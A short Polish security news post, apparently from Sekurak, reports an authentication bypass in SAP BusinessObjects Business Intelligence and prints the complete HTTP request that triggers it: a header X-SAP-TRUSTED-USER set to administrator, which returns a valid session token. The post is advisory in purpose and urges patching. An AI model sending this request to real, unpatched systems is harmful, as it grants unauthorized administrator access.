Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Adminie… Czy znamy Twoje grzechy? ;-) Sprawdź!
Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Adminie… Czy znamy Twoje grzechy? ;-) Sprawdź!
TLDR:
Niedawno opisywaliśmy jak dodanie nagłówka w Palo Alto pozwala na wykonanie kodu w PAN-OS w kontekście użytkownika root. Błąd wydaje się zabawny, gdyby nie poważne konsekwencje jego wykorzystania. Jak się okazuje, nie tylko urządzenia mające na celu zwiększenie bezpieczeństwa dopadają trywialne podatności, bo podobny błąd udało się znaleźć w oprogramowaniu SAP BusinessObjects Business Intelligence.
| GET /biprws/logon/trusted HTTP/1.1 Host: SAP_BOBJ:6405 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Upgrade-Insecure-Requests: 1 Priority: u=0, i X-SAP-TRUSTED-USER: administrator |
Dodanie nagłówka X-SAP-TRUSTED-USER z wartością administrator wystarczyło, aby otrzymać poprawny token sesyjny i uwierzytelnić się w aplikacji. Prawda, że piękne?
Producent informuje, że problem został załatany w następujących wydaniach:
Użytkownikom jak zwykle zalecamy monitorowanie wydawanych biuletynów bezpieczeństwa oraz wdrożenie wymaganych łatek. Jak widać nie wszystkie proste błędy zostały jeszcze znalezione, więc jeśli zajmujecie się poprawianiem bezpieczeństwa produktów, poszukując podatności, to nie musicie skupiać się tylko i wyłącznie na tych bardziej skomplikowanych łańcuchach :)
~fc